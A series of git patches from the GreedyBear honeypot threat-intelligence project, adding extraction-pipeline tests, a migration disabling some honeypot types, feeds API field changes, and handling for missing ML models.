+ MockElasticHit({"src_ip": "5.6.7.8", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "9.10.11.12", "type": "Log4pot"}),
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ mock_strategy = MagicMock()
+ mock_strategy.ioc_records = []
+ mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+ pipeline.execute()
+
+ # Should be called for both honeypot types
+ self.assertEqual(mock_factory.return_value.get_strategy.call_count, 2)
+
+ # Verify strategy is called with correct honeypot types
+ calls = mock_factory.return_value.get_strategy.call_args_list
+ honeypot_names = {call[0][0] for call in calls}
+ self.assertEqual(honeypot_names, {"Cowrie", "Log4pot"})
+
+ # Verify extract_from_hits is called twice
+ self.assertEqual(mock_strategy.extract_from_hits.call_count, 2)
+
+ # Verify each strategy received correct number of hits
+ extraction_calls = mock_strategy.extract_from_hits.call_args_list
+ hits_counts = sorted([len(call[0][0]) for call in extraction_calls])
+ self.assertEqual(hits_counts, [1, 2]) # 1 Log4pot hit, 2 Cowrie hits
+
+
+class TestExecuteStrategySelection(ExtractionPipelineTestCase):
+ """Tests for strategy selection and execution in execute()."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_skips_honeypot_not_ready_for_extraction(self, mock_factory, mock_scores):
+ """Should skip honeypots that are not ready for extraction."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"src_ip": "1.2.3.4", "type": "DisabledHoneypot"}),
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = False
+
+ result = pipeline.execute()
+
+ self.assertEqual(result, 0)
+ mock_factory.return_value.get_strategy.assert_not_called()
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_calls_extract_from_hits_on_strategy(self, mock_factory, mock_scores):
+ """Should call extract_from_hits on the selected strategy."""
+ pipeline = self._create_pipeline_with_mocks()
+ hit_data = {"src_ip": "1.2.3.4", "type": "Cowrie", "session": "abc123"}
+ pipeline.elastic_repo.search.return_value = [MockElasticHit(hit_data)]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ mock_strategy = MagicMock()
+ mock_strategy.ioc_records = []
+ mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+ pipeline.execute()
+
+ mock_strategy.extract_from_hits.assert_called_once()
+ # Verify the hits passed contain our data
+ call_args = mock_strategy.extract_from_hits.call_args[0][0]
+ self.assertEqual(len(call_args), 1)
+ self.assertEqual(call_args[0]["src_ip"], "1.2.3.4")
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_collects_ioc_records_from_strategies(self, mock_factory, mock_scores):
+ """Should collect IOC records from all strategies."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ mock_ioc = self._create_mock_ioc("1.2.3.4")
+ mock_strategy = MagicMock()
+ mock_strategy.ioc_records = [mock_ioc]
+ mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+ result = pipeline.execute()
+
+ self.assertEqual(result, 1)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_accumulates_iocs_from_multiple_strategies(self, mock_factory, mock_scores):
+ """Should accumulate IOC records from multiple successful strategies."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "5.6.7.8", "type": "Log4pot"}),
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ # Mock two different strategies
+ mock_cowrie_strategy = MagicMock()
+ mock_cowrie_ioc = self._create_mock_ioc("1.2.3.4")
+ mock_cowrie_strategy.ioc_records = [mock_cowrie_ioc]
+
+ mock_log4pot_strategy = MagicMock()
+ mock_log4pot_ioc = self._create_mock_ioc("5.6.7.8")
+ mock_log4pot_strategy.ioc_records = [mock_log4pot_ioc]
+
+ # Return strategies in sequence
+ mock_factory.return_value.get_strategy.side_effect = [mock_cowrie_strategy, mock_log4pot_strategy]
+
+ result = pipeline.execute()
+
+ # Should return total count (1 + 1 = 2)
+ self.assertEqual(result, 2)
+
+ # Verify both strategies were executed
+ self.assertEqual(mock_cowrie_strategy.extract_from_hits.call_count, 1)
+ self.assertEqual(mock_log4pot_strategy.extract_from_hits.call_count, 1)
+
+ # Verify data flow to scoring
+ mock_scores.return_value.score_only.assert_called_once()
+ collected_iocs = mock_scores.return_value.score_only.call_args[0][0]
+ self.assertEqual(len(collected_iocs), 2)
+ self.assertIn(mock_cowrie_ioc, collected_iocs)
+ self.assertIn(mock_log4pot_ioc, collected_iocs)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_handles_strategy_exception_gracefully(self, mock_factory, mock_scores):
+ """Strategy exceptions should be caught and logged, not crash pipeline."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.log = MagicMock()
+
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "5.6.7.8", "type": "Log4pot"}),
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ # First strategy raises exception, second succeeds
+ mock_failing_strategy = MagicMock()
+ mock_failing_strategy.extract_from_hits.side_effect = Exception("Test error")
+
+ mock_success_strategy = MagicMock()
+ mock_success_strategy.ioc_records = [self._create_mock_ioc("5.6.7.8")]
+
+ mock_factory.return_value.get_strategy.side_effect = [mock_failing_strategy, mock_success_strategy]
+
+ # Should not raise, should continue with next strategy
+ result = pipeline.execute()
+
+ self.assertEqual(result, 1)
+ pipeline.log.error.assert_called_once()
+
+
+class TestExecuteScoring(ExtractionPipelineTestCase):
+ """Tests for scoring logic in execute()."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_updates_scores_when_iocs_extracted(self, mock_factory, mock_scores):
+ """Should call UpdateScores.score_only when IOCs are extracted."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ mock_ioc = self._create_mock_ioc("1.2.3.4")
+ mock_strategy = MagicMock()
+ mock_strategy.ioc_records = [mock_ioc]
+ mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+ pipeline.execute()
+
+ mock_scores.return_value.score_only.assert_called_once()
+ call_args = mock_scores.return_value.score_only.call_args[0][0]
+ self.assertEqual(len(call_args), 1)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_skips_scoring_when_no_iocs(self, mock_factory, mock_scores):
+ """Should not call UpdateScores when no IOCs are extracted."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = []
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ pipeline.execute()
+
+ mock_scores.return_value.score_only.assert_not_called()
+
+
+class TestExecuteEmptyResponse(ExtractionPipelineTestCase):
+ """Tests for empty Elasticsearch response handling."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_handles_empty_search_result(self, mock_factory, mock_scores):
+ """Should handle empty Elasticsearch response gracefully."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = []
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ result = pipeline.execute()
+
+ self.assertEqual(result, 0)
+ mock_factory.return_value.get_strategy.assert_not_called()
+ mock_scores.return_value.score_only.assert_not_called()
From 3daf2469b1da387aaaeacc6bdabf2fefd8bdd9cf Mon Sep 17 00:00:00 2001
From: Sumit Das
Date: Wed, 28 Jan 2026 17:45:47 +0530
Subject: [PATCH 65/75] feat: Disable additional honeypots (Closes #738) (#739)
- Add migration to disable Fatt, P0f, ssh-dss, ssh-ed25519 honeypots
- Follows pattern from #631
- Uses get_or_create to ensure idempotency
Co-authored-by: SUMIT DAS
---
.../0033_disable_additional_honeypots.py | 35 +++++++++++++++++++
1 file changed, 35 insertions(+)
create mode 100644 greedybear/migrations/0033_disable_additional_honeypots.py
diff --git a/greedybear/migrations/0033_disable_additional_honeypots.py b/greedybear/migrations/0033_disable_additional_honeypots.py
new file mode 100644
index 00000000..f0b19242
--- /dev/null
+++ b/greedybear/migrations/0033_disable_additional_honeypots.py
@@ -0,0 +1,35 @@
+from django.db import migrations
+
+
+def disable_additional_honeypots(apps, schema_editor):
+ """
+ Disable additional honeypots: Fatt, P0f, ssh-dss, ssh-ed25519
+ """
+ GeneralHoneypot = apps.get_model("greedybear", "GeneralHoneypot")
+
+ unwanted = [
+ "Fatt",
+ "P0f",
+ "ssh-dss",
+ "ssh-ed25519",
+ ]
+
+ for name in unwanted:
+ GeneralHoneypot.objects.get_or_create(
+ name=name,
+ defaults={"active": False},
+ )
+
+
+class Migration(migrations.Migration):
+
+ dependencies = [
+ ("greedybear", "0032_torexitnode"),
+ ]
+
+ operations = [
+ migrations.RunPython(
+ disable_additional_honeypots,
+ reverse_code=migrations.RunPython.noop,
+ ),
+ ]
From eed72cbd7d52b9b407fd5dd85f900458a568ac25 Mon Sep 17 00:00:00 2001
From: Sumit Das
Date: Wed, 28 Jan 2026 18:57:18 +0530
Subject: [PATCH 66/75] fix: Respect verbose parameter in feeds API response
(Fixes #741) (#743)
- Split required_fields into base_fields and verbose_fields
- Base fields always returned (value, first_seen, attack_count, etc.)
- Verbose fields only returned when verbose=true:
- days_seen
- destination_ports
- honeypots
- firehol_categories
- destination_port_count only calculated when destination_ports exists
This ensures /api/feeds endpoints return concise responses by default,
with verbose data only when explicitly requested via verbose=true parameter.
Co-authored-by: SUMIT DAS
---
api/views/utils.py | 33 +++++++++++++++++++++++----------
1 file changed, 23 insertions(+), 10 deletions(-)
diff --git a/api/views/utils.py b/api/views/utils.py
index 1bd77d89..52c19696 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -205,13 +205,11 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
Format the IOC data into the requested format (e.g., JSON, CSV, TXT).
Args:
- request: The incoming request object.
iocs (QuerySet): The filtered queryset of IOC data.
- feed_type (str): Type of feed (e.g., log4j, cowrie, etc.).
+ feed_params (FeedRequestParams): Request parameters including format.
valid_feed_types (frozenset): The set of all valid feed types.
- format_ (str): Desired format of the response (e.g., json, csv, txt).
dict_only (bool): Return IOC dictionary instead of Response object.
- verbose (bool): Include IOC properties that may contain a lot of data.
+ verbose (bool): Include verbose fields (days_seen, destination_ports, honeypots, firehol_categories).
Returns:
Response: The HTTP response containing formatted IOC data.
@@ -235,7 +233,9 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
)
case "json":
json_list = []
- required_fields = {
+
+ # Base fields always returned
+ base_fields = {
"value",
"first_seen",
"last_seen",
@@ -244,16 +244,23 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
"scanner",
"payload_request",
"ip_reputation",
- "firehol_categories",
"asn",
- "destination_ports",
"login_attempts",
- "honeypots",
- "days_seen",
"recurrence_probability",
"expected_interactions",
+ "honeypots", # Always needed to calculate feed_type
+ "destination_ports", # Always needed to calculate destination_port_count
+ }
+
+ # Additional verbose fields
+ verbose_only_fields = {
+ "days_seen",
+ "firehol_categories",
}
+ # Fetch fields from database (always include honeypots and destination_ports)
+ required_fields = base_fields | verbose_only_fields if verbose else base_fields
+
# Collect values; `honeypots` will contain the list of associated honeypot names
iocs = (ioc_as_dict(ioc, required_fields) for ioc in iocs) if isinstance(iocs, list) else iocs.values(*required_fields)
for ioc in iocs:
@@ -263,9 +270,15 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
"first_seen": ioc["first_seen"].strftime("%Y-%m-%d"),
"last_seen": ioc["last_seen"].strftime("%Y-%m-%d"),
"feed_type": ioc_feed_type,
- "destination_port_count": len(ioc["destination_ports"]),
+ "destination_port_count": len(ioc.get("destination_ports", [])),
}
+ # Remove verbose-only fields from response when not in verbose mode
+ if not verbose:
+ # Remove honeypots and destination_ports arrays from response
+ data_.pop("honeypots", None)
+ data_.pop("destination_ports", None)
+
# Skip validation - data_ is constructed internally and matches the API contract
json_list.append(data_)
From 763583c29b8d4dbb77956b2a61a7a05194e16e4c Mon Sep 17 00:00:00 2001
From: Sumit Das
Date: Thu, 29 Jan 2026 12:38:38 +0530
Subject: [PATCH 67/75] fix: Remove redundant honeypots field from feeds API
response (Fixes #744) (#745)
- honeypots was redundant with feed_type (same data, different casing)
- Still fetch honeypots from DB to calculate feed_type
- Remove honeypots from response in both verbose and non-verbose modes
- Users only see feed_type which has all necessary information
Co-authored-by: SUMIT DAS
---
api/views/utils.py | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/api/views/utils.py b/api/views/utils.py
index 52c19696..bc4742c8 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -275,10 +275,12 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
# Remove verbose-only fields from response when not in verbose mode
if not verbose:
- # Remove honeypots and destination_ports arrays from response
- data_.pop("honeypots", None)
+ # Remove destination_ports array from response
data_.pop("destination_ports", None)
+ # Always remove honeypots field as it's redundant with feed_type
+ data_.pop("honeypots", None)
+
# Skip validation - data_ is constructed internally and matches the API contract
json_list.append(data_)
From 38915c8b10213ccf5f28684b32cebe308e251d15 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Thu, 29 Jan 2026 11:42:15 +0100
Subject: [PATCH 68/75] Handle missing ML models gracefully during extraction.
Closes #748 (#749)
* add check for model availability an log warning if not
* add test case
* fix format
---
greedybear/cronjobs/scoring/ml_model.py | 15 +++++++++++++++
tests/test_rf_models.py | 23 ++++++++++++++++++++++-
2 files changed, 37 insertions(+), 1 deletion(-)
diff --git a/greedybear/cronjobs/scoring/ml_model.py b/greedybear/cronjobs/scoring/ml_model.py
index 641a7417..aa6b2396 100644
--- a/greedybear/cronjobs/scoring/ml_model.py
+++ b/greedybear/cronjobs/scoring/ml_model.py
@@ -93,6 +93,14 @@ def add_missing_features(self, df: pd.DataFrame) -> pd.DataFrame:
df[feature] = 0
return df[train_features]
+ @property
+ def is_available(self) -> bool:
+ """Check whether the model is already loaded or its file exists on disk."""
+ if "model" in self.__dict__:
+ return True
+ storage = FileSystemStorage(location=ML_MODEL_DIRECTORY)
+ return storage.exists(self.file_name)
+
def score(self, df: pd.DataFrame) -> pd.DataFrame:
"""
Score input data using the trained model.
@@ -112,6 +120,13 @@ def score(self, df: pd.DataFrame) -> pd.DataFrame:
ValueError: If required features are missing from input
"""
self.log.info(f"calculate {self.score_name} with {self.name}")
+
+ if not self.is_available:
+ self.log.warning(f"no trained model available for {self.name}, skipping scoring")
+ result_df = df.copy()
+ result_df[self.score_name] = 0
+ return result_df
+
missing_features = set(self.features) - set(df.columns)
if missing_features:
raise ValueError(f"Missing required features: {missing_features}")
diff --git a/tests/test_rf_models.py b/tests/test_rf_models.py
index 102517f8..95fbe2e3 100644
--- a/tests/test_rf_models.py
+++ b/tests/test_rf_models.py
@@ -1,4 +1,4 @@
-from unittest.mock import Mock
+from unittest.mock import Mock, patch
import numpy as np
import pandas as pd
@@ -115,3 +115,24 @@ def test_negative_predictions(self):
expected = np.array([0, 5, 0, 0, 2])
np.testing.assert_array_equal(predictions, expected)
+
+
+class TestModelUnavailable(CustomTestCase):
+ """Test that scoring handles missing model files gracefully."""
+
+ class MockRFClassifier(TestClassifier.MockRFModel, Classifier):
+ def __init__(self):
+ super().__init__("Mock Random Forest Classifier", "mock_score")
+
+ @property
+ def untrained_model(self):
+ return Mock()
+
+ @patch("greedybear.cronjobs.scoring.ml_model.FileSystemStorage")
+ def test_score_skips_when_model_unavailable(self, mock_storage_cls):
+ """When the model file does not exist, score() should return a DataFrame with the score column set to 0."""
+ mock_storage_cls.return_value.exists.return_value = False
+ classifier = self.MockRFClassifier()
+ df = classifier.score(SAMPLE_DATA)
+ self.assertIn("mock_score", df.columns)
+ self.assertTrue((df["mock_score"] == 0).all())
From c0558dd0c5d554345f6716b3e6ba58453b896ccb Mon Sep 17 00:00:00 2001
From: Matteo Lodi <30625432+mlodic@users.noreply.github.com>
Date: Thu, 29 Jan 2026 14:50:29 +0100
Subject: [PATCH 69/75] added note on readme
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 9b25f59e..acb57d4c 100644
--- a/README.md
+++ b/README.md
@@ -64,6 +64,6 @@ In 2022 we joined the official [DigitalOcean Open Source Program](https://www.di
This project was started as a personal Christmas project by [Matteo Lodi](https://twitter.com/matte_lodi) in 2021.
Special thanks to:
-* [Tim Leonhard](https://github.com/regulartim) for having greatly improved the project and added Machine Learning Models during his master thesis.
+* [Tim Leonhard](https://github.com/regulartim) for having greatly improved the project and added Machine Learning Models during his master thesis. He's the actual Principal Mantainer.
* [Martina Carella](https://github.com/carellamartina) for having created the GUI during her master thesis.
* [Daniele Rosetti](https://github.com/drosetti) for helping maintaining the Frontend.
From 69b48bf79ff9e57ff1d4d8dcc475e322fab1c2c2 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Thu, 29 Jan 2026 14:55:32 +0100
Subject: [PATCH 70/75] Add link to blog post for v3 release (#751)
* add v3 announcement
* change version number format to match other posts
---
frontend/src/components/home/Home.jsx | 6 ++++++
1 file changed, 6 insertions(+)
diff --git a/frontend/src/components/home/Home.jsx b/frontend/src/components/home/Home.jsx
index 29671007..8ea6cf00 100644
--- a/frontend/src/components/home/Home.jsx
+++ b/frontend/src/components/home/Home.jsx
@@ -11,6 +11,12 @@ const versionText = VERSION;
// const versionText = "v1.0.0";
const logoBgImg = `url('${PUBLIC_URL}/greedybear.png')`;
const blogPosts = [
+ {
+ title: "GreedyBear version 3.0 coming",
+ subText: "With many new features!",
+ date: "29th January 2026",
+ link: "https://intelowlproject.github.io/blogs/greedybear_v3_release",
+ },
{
title: "GreedyBear version 2.0 released",
subText: "Upgrade from 1.x requires manual intervention",
From a5e95cb95b48cd88d37272989687d742a26a1dc9 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Thu, 29 Jan 2026 19:51:55 +0530
Subject: [PATCH 71/75] Strategy-specific E2E tests and edge cases for
ExtractionPipeline. Closes #636 (#740)
* Add strategy-specific E2E tests and edge cases for ExtractionPipeline. Closes #636
* fix: address PR feedback - improve test assertions and remove unused mocks
- Replace weak assertGreaterEqual(result, 0) with specific mock.call_count assertions
- Fix E2E tests to use proper ExtractionStrategyFactory mocking pattern
- Remove unnecessary UpdateScores patch decorators from factory tests
- Remove unused mock_scores parameters
* refactor: split pipeline tests and use real factory/strategies in E2E
- Split monolithic test file into 4 focused files
- E2E tests now use real ExtractionStrategyFactory and strategies
- Only mock repositories at the boundary
- Tests actual integration path as it runs in production
* test: add back edge cases for pipeline tests
- test_honeypot_skipped_when_not_ready (grouping file)
- test_strategy_returns_empty_ioc_records (E2E file)
- test_partial_strategy_success (E2E file)
- test_large_batch_of_hits (E2E file)
* Add IOC content verification tests and reorganize test files
- Add TestIocContentVerification class with 3 tests for IOC content verification
- Move E2ETestCase class to tests/__init__.py for shared usage (reviewer feedback)
- Split edge cases into test_extraction_pipeline_edge_cases.py
Edge cases now clearly document when mocking is required:
- test_partial_strategy_success: Mocks factory (needs to force exception)
- test_large_batch_of_hits_with_real_strategy: Uses REAL strategy
Tests added:
- test_cowrie_ioc_content_verified: Verifies IOC has correct IP
- test_multiple_honeypots_ioc_content_verified: Verifies multiple IOCs
- test_ioc_scanner_field_contains_honeypot_type: Verifies scanner field
Addresses reviewer feedback to:
1. Verify actual IOC content, not just count
2. Move shared test infrastructure to tests/__init__.py
3. Keep test files focused and manageable in size
4. Use real strategies where possible in tests
* Fix misleading comment in large batch test
* test: explicitly assert IOC extraction count before verifying scoring call in e2e pipeline test
---
tests/__init__.py | 30 ++
.../cronjobs/test_extraction_pipeline.py | 380 -------------
.../cronjobs/test_extraction_pipeline_e2e.py | 506 ++++++++++++++++++
.../test_extraction_pipeline_edge_cases.py | 102 ++++
.../test_extraction_pipeline_factory.py | 87 +++
.../test_extraction_pipeline_grouping.py | 236 ++++++++
.../cronjobs/test_extraction_pipeline_init.py | 80 +++
7 files changed, 1041 insertions(+), 380 deletions(-)
delete mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline.py
create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline_init.py
diff --git a/tests/__init__.py b/tests/__init__.py
index 186afdca..fdf715f9 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -245,3 +245,33 @@ def get(self, key, default=None):
def to_dict(self):
return self._data.copy()
+
+
+class E2ETestCase(ExtractionTestCase):
+ """Base test case for E2E pipeline tests with real strategies.
+
+ This base class provides helpers for creating pipelines with mocked
+ repositories but REAL strategies, enabling true integration testing.
+ """
+
+ def _create_pipeline_with_real_factory(self):
+ """
+ Create a pipeline with mocked repositories but REAL factory/strategies.
+
+ This approach tests the actual integration:
+ Pipeline → real Factory → real Strategy → IOC extraction
+
+ Returns:
+ ExtractionPipeline: Pipeline with mocked repos, real strategies.
+ """
+ from unittest.mock import patch
+
+ with (
+ patch("greedybear.cronjobs.extraction.pipeline.SensorRepository"),
+ patch("greedybear.cronjobs.extraction.pipeline.IocRepository"),
+ patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository"),
+ ):
+ from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+ pipeline = ExtractionPipeline()
+ return pipeline
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline.py b/tests/greedybear/cronjobs/test_extraction_pipeline.py
deleted file mode 100644
index bcd9aaea..00000000
--- a/tests/greedybear/cronjobs/test_extraction_pipeline.py
+++ /dev/null
@@ -1,380 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-"""
-End-to-end tests for the ExtractionPipeline class.
-
-Tests the complete extraction workflow from Elasticsearch hits
-through strategy selection, IOC extraction, and scoring.
-"""
-
-from unittest.mock import MagicMock, patch
-
-from tests import ExtractionTestCase, MockElasticHit
-
-
-class ExtractionPipelineTestCase(ExtractionTestCase):
- """Base test case for extraction pipeline tests, reusing common extraction helpers."""
-
- def _create_pipeline_with_mocks(self):
- """Helper to create a pipeline with mocked dependencies."""
- with (
- patch("greedybear.cronjobs.extraction.pipeline.SensorRepository"),
- patch("greedybear.cronjobs.extraction.pipeline.IocRepository"),
- patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository"),
- ):
- from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
- pipeline = ExtractionPipeline()
- return pipeline
-
-
-class TestExtractionPipelineInit(ExtractionPipelineTestCase):
- """Tests for ExtractionPipeline initialization."""
-
- @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
- @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
- @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
- def test_initializes_repositories(self, mock_elastic, mock_ioc, mock_sensor):
- """Pipeline should initialize all required repositories."""
- from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
- pipeline = ExtractionPipeline()
-
- mock_elastic.assert_called_once()
- mock_ioc.assert_called_once()
- mock_sensor.assert_called_once()
- self.assertIsNotNone(pipeline.log)
-
-
-class TestMinutesBackToLookup(ExtractionPipelineTestCase):
- """Tests for the _minutes_back_to_lookup property."""
-
- @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
- @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
- @patch("greedybear.cronjobs.extraction.pipeline.INITIAL_EXTRACTION_TIMESPAN", 120)
- @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
- @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
- @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
- def test_returns_initial_timespan_when_empty(self, mock_elastic, mock_ioc, mock_sensor):
- """Should return INITIAL_EXTRACTION_TIMESPAN on first run (empty DB)."""
- from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
- pipeline = ExtractionPipeline()
- pipeline.ioc_repo.is_empty.return_value = True
-
- result = pipeline._minutes_back_to_lookup
-
- self.assertEqual(result, 120)
-
- @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
- @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
- @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
- @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
- @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
- def test_returns_extraction_interval_when_not_empty(self, mock_elastic, mock_ioc, mock_sensor):
- """Should return EXTRACTION_INTERVAL for subsequent runs."""
- from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
- pipeline = ExtractionPipeline()
- pipeline.ioc_repo.is_empty.return_value = False
-
- result = pipeline._minutes_back_to_lookup
-
- self.assertEqual(result, 5)
-
- @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", True)
- @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
- @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
- @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
- @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
- def test_returns_11_for_legacy_extraction(self, mock_elastic, mock_ioc, mock_sensor):
- """Should return 11 when LEGACY_EXTRACTION is enabled."""
- from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
- pipeline = ExtractionPipeline()
- pipeline.ioc_repo.is_empty.return_value = False
-
- result = pipeline._minutes_back_to_lookup
-
- self.assertEqual(result, 11)
-
-
-class TestExecuteHitGrouping(ExtractionPipelineTestCase):
- """Tests for hit grouping logic in execute()."""
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_skips_hits_without_src_ip(self, mock_factory, mock_scores):
- """Hits without src_ip should be skipped."""
- pipeline = self._create_pipeline_with_mocks()
- pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"type": "Cowrie"}), # missing src_ip
- MockElasticHit({"src_ip": "", "type": "Cowrie"}), # empty src_ip
- MockElasticHit({"src_ip": " ", "type": "Cowrie"}), # whitespace-only src_ip
- ]
- pipeline.ioc_repo.is_empty.return_value = False
-
- result = pipeline.execute()
-
- self.assertEqual(result, 0)
- mock_factory.return_value.get_strategy.assert_not_called()
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_skips_hits_without_type(self, mock_factory, mock_scores):
- """Hits without type (honeypot) should be skipped."""
- pipeline = self._create_pipeline_with_mocks()
- pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"src_ip": "1.2.3.4"}), # missing type
- MockElasticHit({"src_ip": "1.2.3.4", "type": ""}), # empty type
- MockElasticHit({"src_ip": "1.2.3.4", "type": " "}), # whitespace-only type
- ]
- pipeline.ioc_repo.is_empty.return_value = False
-
- result = pipeline.execute()
-
- self.assertEqual(result, 0)
- mock_factory.return_value.get_strategy.assert_not_called()
-
- @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
- @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 10)
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_extracts_sensor_from_hits(self, mock_factory, mock_scores):
- """
- Should extract and register sensors from t-pot_ip_ext field.
- Also verifies correct time window is passed to search().
- """
- pipeline = self._create_pipeline_with_mocks()
- pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie", "t-pot_ip_ext": "10.0.0.1"}),
- ]
- pipeline.ioc_repo.is_empty.return_value = False
